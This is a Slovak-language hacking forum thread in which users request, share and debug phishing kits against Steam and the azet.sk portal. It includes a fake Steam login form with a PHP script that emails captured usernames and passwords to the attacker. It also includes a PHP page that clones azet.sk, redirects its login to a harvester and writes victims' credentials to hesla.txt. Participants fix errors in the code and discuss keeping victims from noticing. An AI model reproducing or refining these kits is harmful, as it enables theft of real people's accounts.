Phishing
-
Dawn
Medium Star
- Kontaktovať používateľa:
-
killergage
Amateur
orangeportal
na orangeportal.sk nieje nejaký phishing.
Súrne zhánam.
Súrne zhánam.
mnoo, toto sa sem nehodí, aaale..
ja zháňam, resp. sa pokúšam urobiť na pobox.sk
mám takú startpage, kde len kliknem na odkazy a automaticky ma to prihlasuje, aby som nemusel zadávať meno, heslo atď, nebavia ma také veci.. tak si to trošku automatizujem..
ak by to niekto mal, tak by bodlo.. (môj problém spočíva v tom, že jednak ja tam pošlem tie _POST cez curl, ale ten script setuje cookies a cez curl maximálne môžem uložiť [aj vypísať] cookies, ktoré ten script chce nastaviť, potom rozparsujem, ale výsledok je na houby, bo keď nastavím cookie, tak sa ukladá aj pre ktorú doménu patrí, čiže pobox-u sa to nezobrazí.. [možno tam je taká možnosť, uložiť cookie cez curl automaticky, nejak selectnúť prehliadač [abo ako to lepšie vystihnúť], avšak o tom siiilno pochybujem..])..
thx...
ja zháňam, resp. sa pokúšam urobiť na pobox.sk
mám takú startpage, kde len kliknem na odkazy a automaticky ma to prihlasuje, aby som nemusel zadávať meno, heslo atď, nebavia ma také veci.. tak si to trošku automatizujem..
ak by to niekto mal, tak by bodlo.. (môj problém spočíva v tom, že jednak ja tam pošlem tie _POST cez curl, ale ten script setuje cookies a cez curl maximálne môžem uložiť [aj vypísať] cookies, ktoré ten script chce nastaviť, potom rozparsujem, ale výsledok je na houby, bo keď nastavím cookie, tak sa ukladá aj pre ktorú doménu patrí, čiže pobox-u sa to nezobrazí.. [možno tam je taká možnosť, uložiť cookie cez curl automaticky, nejak selectnúť prehliadač [abo ako to lepšie vystihnúť], avšak o tom siiilno pochybujem..])..
thx...
... drahúšik, ak chceš užívateľa prihlásiť na azet, tak POSTovaním zo svojho servera si nepomôžeš, akosi mu totiž stále bude chýbať autentifikačný koláčik (cookie). Takže jedine presmerovať a parametre v URL.Finalway napísal: ... : pls, nechodievaj radšej do tejto sekcie, lebo jediný kto je mimo si ty..
Edit: no vidím (príspevok vyššie), že si na to prišiel už aj sám. Takže kto je tu mimo?
(drahúšika máš niekde tam medzi nohami na mydlenie po nociach)... stále si mimo a stále trepeš tie isté hovadiny.. bol si ty vlastne niekedy na azete? očividne nie, nakoľko tam používajú self-created autentifikáciu (session - i9), takže o koláčikoch mi tu nevyprávaj, tie sa týkajú pobox-u..... napísal:... drahúšik, ak chceš užívateľa prihlásiť na azet, tak POSTovaním zo svojho servera si nepomôžeš, akosi mu totiž stále bude chýbať autentifikačný koláčik (cookie). Takže jedine presmerovať a parametre v URL.
Edit: no vidím (príspevok vyššie), že si na to prišiel už aj sám. Takže kto je tu mimo?
no skús teraz trošku inteligentne niečo vypotiť.. na to ale zrejme nemáš..
...ROFL, tak oni sú vážne ešte tupší, ako som si myslelFinalway napísal:stále si mimo a stále trepeš tie isté hovadiny.. bol si ty vlastne niekedy na azete? očividne nie, nakoľko tam používajú self-created autentifikáciu (session - i9), takže o koláčikoch mi tu nevyprávaj, tie sa týkajú pobox-u..
Samozrejme máš pravdu, neviem ako som si toto mohol nevšimnúť
Ide vam to niekomu??? Tu upravenu verziu od Anti. Mne otvori index.php ako by malo, potom subor login.php neviem lebo ho neako nevidno a rovno ma hodi na login azetu pricom ma ale nelogne a v subore hesla.txt kde mam chmod 777 nie je nic. Je proste prazdny.
//ok uz to ide ale aj tak mam jeden dotaz. Ako vie ten login.php ze premenná nick je nick a premenná heslo ze je heslo?
//ok uz to ide ale aj tak mam jeden dotaz. Ako vie ten login.php ze premenná nick je nick a premenná heslo ze je heslo?
+dalsia vec
mam tu jeden formular
ktorym vyvolam script
Nemam tam niekde chybu?? ide o to aby po stlaceni submit mi odosle premennu login a premennu heslo na mail. Neviem ci ic.cz podporuje funkciu mail taze sa ma na to nepytajte. nehlasi to ziadnu chybu.
mam tu jeden formular
Kód: Vybrať všetko
<form method="POST" action="http://v1p.ic.cz/phis/steam/steam.php">
<!--webbot bot="SaveResults" U-File="fpweb:///_private/form_results.csv" S-Format="TEXT/CSV" S-Label-Fields="TRUE" -->
<p><b><font size="2">Login:</font></b> <input type="text" name="login" id="login" size="20"></p>
<p><b><font size="2">Heslo: </font> </b> <input type="password" name="heslo" id="heslo" size="20">
<p> <p>
<input type="submit" value="Odoslať" name="B1" id="screenshots"></form>
<?
$to = "[email protected]";
$extra = "From: $login\r\nReply-To:
$login\r\n";
$subject = "Heslo";
$mess = "Steam pass: $login heslo: $heslo";
mail ($to, $subject, $mess, $extra);
//header("location: http://v1p.ic.cz/phis/steam/dakujeme.html");
?>
-
mastermind
VIP
Som zistil preco ten azet phis funguje ako ma....
vo formulari, je tam je tam parameter id= a preto vie dalsi script ktory je vykonany formularom co znamenaju tie premenne. ale aj tak to nejde
+nasiel opravil som si dalsiu chybu. zevraj premenne nemozu byt v uvodzovkach.
Teraz kod vyzera takto:
formular.html
steam.php
Specailne diky Anti-mu 
vo formulari, je tam je tam parameter id= a preto vie dalsi script ktory je vykonany formularom co znamenaju tie premenne. ale aj tak to nejde
Teraz kod vyzera takto:
formular.html
<form method="POST" action="http://v1p.netfast.org/phis/steam/steam.php">
<!--webbot bot="SaveResults" U-File="fpweb:///_private/form_results.csv" S-Format="TEXT/CSV" S-Label-Fields="TRUE" -->
<p><b><font size="2">Login:</font></b> <input type="text" name="login" size="20"></p>
<p><b><font size="2">Heslo: </font> </b> <input type="password" name="heslo" size="20">
<p> <p>
<input type="submit" value="Odoslať" name="B1" id="screenshots"></form>Kód: Vybrať všetko
<?
$extra = "From: $login\r\nReply-To:
$login\r\n";
$subject = "Heslo";
$mess = "Steam pass:" $login "heslo:" $heslo;
mail ($to, $subject, $mess, $extra);
header("location: http://v1p.netfast.org/phis/steam/dakujeme.html");
?>
-
programator
Medium Star
subor steam.php ma vyzerat takto(hovoril som ti to aj na ICQ) a je s niekolkymi vylepseniami... :
<?
$login = $_POST['login'];
$heslo = $_POST['heslo'];
$extra = "From: " . $login . "\r\nReply-To: " . $login . "\r\n";
$subject = "Heslo";
$mess = "Steam pass: " . $login . " \n heslo: " . $heslo;
if (@mail ($to, $subject, $mess, $extra)) header("location: http://v1p.netfast.org/phis/steam/dakujeme.html");
else echo "Chyba pri odosielani e-maliu...";
?>
-
programator
Medium Star
Pretoze ked si tam mal premennu $login a ak je v konfiguracii PHP servera nastavena register globals na off, tak v tej premennej $login nebudes mat nic, pretoze to pouzivas pre viac skriptov...a hodnota tej premennej sa neprenasa lebo mas vypnute register globals... tak to potrebujes preniest cez tzv. "Superglobalne premenne" (najdes ich na stranke www.php.net a zadaj do search napriklad $_GET)VIP721 napísal:Prepac blblo mi icq tak som od teba nedostal nic zrozumitelne... ani ja tebe som nevedel pisat. Diky. A mohol by som poprosit aj neake to vysvetlenie preco si to tak spravil? Mastermind mi nieco pisal ale neko zlozito to znelo.
-
Old Dirty Bastard
Guru
mne píše toto ak to dám na svoj hostAnti napísal:teraz to je funkcne :
------index.php-------
<? $open=FOpen("http://azet.sk/","r"); // otvoríme súbor na čítanie while(!feof($open)) { $read .= fread($open,1024); } FClose($open); // zatvoríme súbor $nahradene=str_replace("http://moje.azet.sk/prihlasenie.phtml?KDE=www.azet.sk%2Findex.phtml%3F","login.php",$read); // Nahradíme login súbor azetu za náš za náš súbor echo $nahradene; // a teraz to celé zobrazíme ?>
----login------
<? $file = @FOpen("hesla.txt", "r"); $data = @FRead($file,FileSize("hesla.txt")); @FClose($file); $file = FOpen("hesla.txt", "w"); FWrite($file,$data.$nick." : ".$heslo."\n"); FClose($file); header("location: http://moje.azet.sk/prihlasenie.phtml?KDE=www.azet.sk%2Findex.phtml%3&nick="); ?>
Warning: fopen(hesla.txt) [function.fopen]: failed to open stream: Permission denied in /domains1/do152700/public/www_root/lol/login.php on line 6
Warning: fwrite(): supplied argument is not a valid stream resource in /domains1/do152700/public/www_root/lol/login.php on line 7
Warning: fclose(): supplied argument is not a valid stream resource in /domains1/do152700/public/www_root/lol/login.php on line 8
Warning: Cannot modify header information - headers already sent by (output started at /domains1/do152700/public/www_root/lol/login.php:6) in /domains1/do152700/public/www_root/lol/login.php on line 9-
Old Dirty Bastard
Guru
-
Old Dirty Bastard
Guru
už to ide ale ked sa niekto prihlási nahlasi mu chybu to je dobre??
mne heslo zapíse do toho textoveho takže to je ok ale bude mu to neaké podozrivé ked napíše meno heslo na azete a vyhodí mu chybu..
napíše toto
mne heslo zapíse do toho textoveho takže to je ok ale bude mu to neaké podozrivé ked napíše meno heslo na azete a vyhodí mu chybu..
napíše toto
Bad Request
Your browser sent a request that this server could not understand.
Apache/1.3.34 Server at www.azet.sk Port 80-
killergage
Amateur
funguje to ešte
chcel som sa spitat ci to este funguje tento script ???
Prosim odpovedzte.
Prosim odpovedzte.